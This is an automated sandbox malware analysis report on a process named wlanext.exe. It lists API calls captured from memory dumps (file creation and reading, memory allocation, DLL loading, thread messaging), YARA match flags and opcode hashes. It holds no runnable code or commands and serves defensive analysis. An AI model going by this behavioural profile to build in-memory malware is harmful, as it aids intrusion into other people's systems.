                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B6FE2B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 69c6ea198ff6300bb8c8e5819e41eded2961d6c85d6f8154c072d74f2bf52e95
                                                          • Instruction ID: 052a8b7edf803f6685686d94243027dd691b749f5d39ba244ab746988c770325
                                                          • Opcode Fuzzy Hash: 69c6ea198ff6300bb8c8e5819e41eded2961d6c85d6f8154c072d74f2bf52e95
                                                          • Instruction Fuzzy Hash: E4F0C232240601BBD6201A45DC02F73BF9AEB44730F250254F628565E1DA62BC7097A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: wlanext.exe PID: 6292 Parent PID: 3388 wlanext.exeCOMMON

                                                          Executed Functions

                                                          Function 030C81BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,030C3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030C3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030C820D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 59e8da1e01e8f4a3e45be5ef3d0bd5a1d2582d96db85c2409dfd24d5fd510d31
                                                          • Instruction ID: 44e1d6013987d1fd270b689c7be013ca08a5e7ee85376b51c110885a7b3c138b
                                                          • Opcode Fuzzy Hash: 59e8da1e01e8f4a3e45be5ef3d0bd5a1d2582d96db85c2409dfd24d5fd510d31
                                                          • Instruction Fuzzy Hash: 4301B2B6241108AFCB18CF98DC95EEB77E9AF8C754F158658FA0DE7240C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C81C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,030C3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030C3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030C820D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: 1ed3ddb89b73b9d66e3245ff79adc0da05e1d0b10a966ef6e70b7c5728a1c9a6
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: 42F0B2B2211208ABCB08CF88DC94EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C82EA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(030C3D30,?,?,030C3D30,00000000,FFFFFFFF), ref: 030C8315
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: d9d201fcfb62367edd8ffb5dbc230c269a0991d1455c7d03308f3ae3c26dbc44
                                                          • Instruction ID: 4096330431afc625ee384893808bfa16045ed022064b2cae2b8b2942b20d0d23
                                                          • Opcode Fuzzy Hash: d9d201fcfb62367edd8ffb5dbc230c269a0991d1455c7d03308f3ae3c26dbc44
                                                          • Instruction Fuzzy Hash: 18F012B6210214ABD714EF98DC80EEB776DEFC8320F148659FA5D9B241D631E915C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C8270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(030C3D52,5E972F59,FFFFFFFF,030C3A11,?,?,030C3D52,?,030C3A11,FFFFFFFF,5E972F59,030C3D52,?,00000000), ref: 030C82B5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: 8061083b6d1368ba15c44c978ff9d5a3978ba5e0c2c5cd2ee261118026fac3cd
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: 2BF0A4B6210208ABCB14DF89DC90EEB77ADAF8C754F158648BA1D97241DA30E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C826C, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(030C3D52,5E972F59,FFFFFFFF,030C3A11,?,?,030C3D52,?,030C3A11,FFFFFFFF,5E972F59,030C3D52,?,00000000), ref: 030C82B5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: d0f7569fab7b448f5a1a463fb8156397a3bb805055009ba2f4a72d62b48a18fb
                                                          • Instruction ID: c004b2f16fbf2e74a09777977994f68b56cc12d11f06f7ac11c6ce52cbb340a2
                                                          • Opcode Fuzzy Hash: d0f7569fab7b448f5a1a463fb8156397a3bb805055009ba2f4a72d62b48a18fb
                                                          • Instruction Fuzzy Hash: 8EF0BDB6200104AFCB14DF89DC90DEB77A9FF8C354F158649FA1D97250D630E911CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C83A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030B2D11,00002000,00003000,00000004), ref: 030C83D9
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: 9c3300702e0c8cd102ae85ec9c03e059189a212d1599e13f224bde72baf20adc
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: 6CF015B6210208ABCB14DF89CC80EEB77ADAF88650F118548FE0897241C630F810CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C82F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(030C3D30,?,?,030C3D30,00000000,FFFFFFFF), ref: 030C8315
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: 9e12772b7c099e74eac4d2aadeb6f345174297289f784f00851a3e7e8cea8814
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: A3D012762003146BD710EF98CC45ED7775CEF44650F154459BA185B241C530F90087E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03789A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2075c1f921dd80d5183ecfb6255f7766519db5d8824405e8b1531d64ad56a65f
                                                          • Instruction ID: 74bf67e5e636a3d2115299490600d7d153d2426c4c57614d54c9d3dd1b434500
                                                          • Opcode Fuzzy Hash: 2075c1f921dd80d5183ecfb6255f7766519db5d8824405e8b1531d64ad56a65f
                                                          • Instruction Fuzzy Hash: DF90026121184446F610A5695D14B07004597D5343F51C226A0144554CCA558C617571
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03789910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5ac4a685f15f7d61946eccf283212a94d93f7e039a3749c64b665142f21e30cd
                                                          • Instruction ID: 30c561ffec953644a9a7581ab83521eb1631b572c0a617e7d7afcc9118741d0e
                                                          • Opcode Fuzzy Hash: 5ac4a685f15f7d61946eccf283212a94d93f7e039a3749c64b665142f21e30cd
                                                          • Instruction Fuzzy Hash: DF9002B120104806F550B1595504746004597D5341F51C122A5054554E87998DD576B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 037899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2612af5a86a4028d474e1339020ef72fe82388d558b16e5cc885a50dd99cae80
                                                          • Instruction ID: 7a483ed11d74554206b16c3d0ef4656d2d478ff8492219f8db161f1e6ec10e5c
                                                          • Opcode Fuzzy Hash: 2612af5a86a4028d474e1339020ef72fe82388d558b16e5cc885a50dd99cae80
                                                          • Instruction Fuzzy Hash: 9B9002A134104846F510A1595514B060045D7E6341F51C126E1054554D8759CC527176
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03789860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d879e009c3a8c5a221cba575b01c6ce150dde305e1e953728fd2dfc20e3a30ff
                                                          • Instruction ID: c3674d47edf42e848d55bfbea953acb8912f683a3427d82111192e00192157b4
                                                          • Opcode Fuzzy Hash: d879e009c3a8c5a221cba575b01c6ce150dde305e1e953728fd2dfc20e3a30ff
                                                          • Instruction Fuzzy Hash: B390027120104817F521A1595604707004997D5281F91C523A0414558D97968D52B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03789840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ec5c437539c1491bfb5e45711facb5d994323a847dbcbf4abb59963b268c042e
                                                          • Instruction ID: 75b911a6644bec3d9569dc433b42a141fc0032aab49636e9405c383c1e8e6726
                                                          • Opcode Fuzzy Hash: ec5c437539c1491bfb5e45711facb5d994323a847dbcbf4abb59963b268c042e
                                                          • Instruction Fuzzy Hash: 34900261242085567955F15955045074046A7E5281791C123A1404950C86669C56F671
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03789710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2b765c6d1f258c989cc94564d0fdf8a3c592bded02d7b01938df6217ee6f26a8
                                                          • Instruction ID: 338fa506bc3b3f4d13b815222cbe94b9451cd8d3dc01fdc93d818e63264aca70
                                                          • Opcode Fuzzy Hash: 2b765c6d1f258c989cc94564d0fdf8a3c592bded02d7b01938df6217ee6f26a8
                                                          • Instruction Fuzzy Hash: 4490027120104806F510A5996508646004597E5341F51D122A5014555EC7A58C917171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03789FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: fb6f474241f0d3e44ca519baf60f09387bfe321e287f12f46375aad7547acc45
                                                          • Instruction ID: 502cacf27989642ccf73acf15b87d1d31a981692f828b440e65f00f7cf7ac599
                                                          • Opcode Fuzzy Hash: fb6f474241f0d3e44ca519baf60f09387bfe321e287f12f46375aad7547acc45
                                                          • Instruction Fuzzy Hash: 0F90027131118806F520A1599504706004597D6241F51C522A0814558D87D58C917172
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03789780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 76980d59df4628f23194832b29f77a06a4daab33d57e300bd709d45fe4fee3f5
                                                          • Instruction ID: dc7008138c8b96b16d690f63c05358853c0c5bac981aeffb3138cbc38b627028
                                                          • Opcode Fuzzy Hash: 76980d59df4628f23194832b29f77a06a4daab33d57e300bd709d45fe4fee3f5
                                                          • Instruction Fuzzy Hash: 7790026921304406F590B159650860A004597D6242F91D526A0005558CCA558C697371
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03789660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 28ef0175ba386643e56322bff6bb23739e1f218ebe04702e3aeb84cdbf0d5e36
                                                          • Instruction ID: fbf6b4add22d702a17c9af4531447d9b7a0f9eb1356b3a5aa0ee6dc3d20ce7e0
                                                          • Opcode Fuzzy Hash: 28ef0175ba386643e56322bff6bb23739e1f218ebe04702e3aeb84cdbf0d5e36
                                                          • Instruction Fuzzy Hash: 2C90027120104C06F590B159550464A004597D6341F91C126A0015654DCB558E5977F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03789650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d942e7d3eb06af8ace8dd49df5d5843ed803d5cd48724ada35435f64bcc2cce0
                                                          • Instruction ID: 413b9df71c2da121b1414cadf9f6bd1ceec5b7a739522f9cadcbceedc7a7399f
                                                          • Opcode Fuzzy Hash: d942e7d3eb06af8ace8dd49df5d5843ed803d5cd48724ada35435f64bcc2cce0
                                                          • Instruction Fuzzy Hash: 4390027120508C46F550B1595504A46005597D5345F51C122A0054694D97658D55B6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 037896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ee60f1eb4fec271c121696b64ade1d8617cea4e35835074cbbd74b65f1079de4
                                                          • Instruction ID: 0cfda18b44589d0724573a32ed1adaba4bb2d0377f5003f80ed8d2ad44ec1966
                                                          • Opcode Fuzzy Hash: ee60f1eb4fec271c121696b64ade1d8617cea4e35835074cbbd74b65f1079de4
                                                          • Instruction Fuzzy Hash: F69002712010CC06F520A159950474A004597D5341F55C522A4414658D87D58C917171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 037896D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 0b1034e2f265d8d504b611d683963c44c24c66f90f043d395ba30f1dc84cffbe
                                                          • Instruction ID: f9c4cf41730686fcbbe6c77ac4a1435f60f8ca0d7656daf924fa28993844a319
                                                          • Opcode Fuzzy Hash: 0b1034e2f265d8d504b611d683963c44c24c66f90f043d395ba30f1dc84cffbe
                                                          • Instruction Fuzzy Hash: B690047130104C47F510F15D5504F470045D7F5341F51C137F0114754DC755CC517571
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03789540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: aff64c9f3531f880c65066aa15925d5341b2511a545362cf681827c4f59cde5b
                                                          • Instruction ID: c95a7d31927e41df47da57631fabd48bb59c8885c3f18f343c1dc91d6a9c0b7d
                                                          • Opcode Fuzzy Hash: aff64c9f3531f880c65066aa15925d5341b2511a545362cf681827c4f59cde5b
                                                          • Instruction Fuzzy Hash: A1900265211044072515E5591704507008697DA391351C132F1005550CD7618C617171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 037895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9fcb0159e10bf1252cbffbb4a080f057533de7bf9e9cdf50e961e39d74a6021c
                                                          • Instruction ID: 5d7554e4fe53010cf85a3e36c48468345a7671a5d5e48c6e31aa76335a004d4b
                                                          • Opcode Fuzzy Hash: 9fcb0159e10bf1252cbffbb4a080f057533de7bf9e9cdf50e961e39d74a6021c
                                                          • Instruction Fuzzy Hash: A99002A1202044076515B1595514616404A97E5241B51C132E1004590DC6658C917175
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C6EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 030C6F88
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: aab60184151efacf410a3a9913dc326cab40346eb6a29d686bf000d5e04e5062
                                                          • Instruction ID: bfad5931518466b50aee6a13dbb1ee6042f1d92ad0f1d9bb6ba4100bc131f9f8
                                                          • Opcode Fuzzy Hash: aab60184151efacf410a3a9913dc326cab40346eb6a29d686bf000d5e04e5062
                                                          • Instruction Fuzzy Hash: AE3170B5612744ABC721DFA4C8A0FABB7F8BB88700F04855DF61A6B240D771B545CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C6EDB, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 030C6F88
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: db66fc3fa53d0e6076099cdf564193105107de067aa33330e58199b1a1e42c19
                                                          • Instruction ID: 62a0466e5ff3c31708dfef0e0faa9709444811f8169f1ab3dedbb4f104da967f
                                                          • Opcode Fuzzy Hash: db66fc3fa53d0e6076099cdf564193105107de067aa33330e58199b1a1e42c19
                                                          • Instruction Fuzzy Hash: F42180B5612744BBC720DFA4C8A1FABB7F8EB88700F04846DF6196B281D775A445CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C84C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030B3B93), ref: 030C84FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 3b8ea5be6fcef70c837e9cd7bbffddb1d3bec4dcf89ef1d557544cfc753c8fd9
                                                          • Instruction ID: 20c2ed86074afac77ca8bcf55bfed922465e0394cda5d4edbd9c1cbd25af1348
                                                          • Opcode Fuzzy Hash: 3b8ea5be6fcef70c837e9cd7bbffddb1d3bec4dcf89ef1d557544cfc753c8fd9
                                                          • Instruction Fuzzy Hash: 30E06DB6500215AFC718DF55DC5AE9BB76CAF84300F11CA9AF9085B251C631A814CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C84D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030B3B93), ref: 030C84FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction ID: 318d9f488b8fc75c05ac89b93d1c127bf20c3f83593c95957702df006b4139e1
                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction Fuzzy Hash: 44E01AB52102046BD714DF59CC44EA777ACAF88650F018558F9085B241C630E910CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030B7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030B72BA
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030B72DB
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 0d251a6efcd9bab6f901e207b7ee06c09f46ef66761929ea5bbfdc0c346a625e
                                                          • Instruction ID: 5cfaa02452e157fe9527c0ca66e486d9e5e6fde129545f0881bcd1c75181d96c
                                                          • Opcode Fuzzy Hash: 0d251a6efcd9bab6f901e207b7ee06c09f46ef66761929ea5bbfdc0c346a625e
                                                          • Instruction Fuzzy Hash: C7018F35A923287AEB20E7948C42FFEB66C9F81B50F154159FF04BE1C0E694690687E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030B9B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 030B9B92
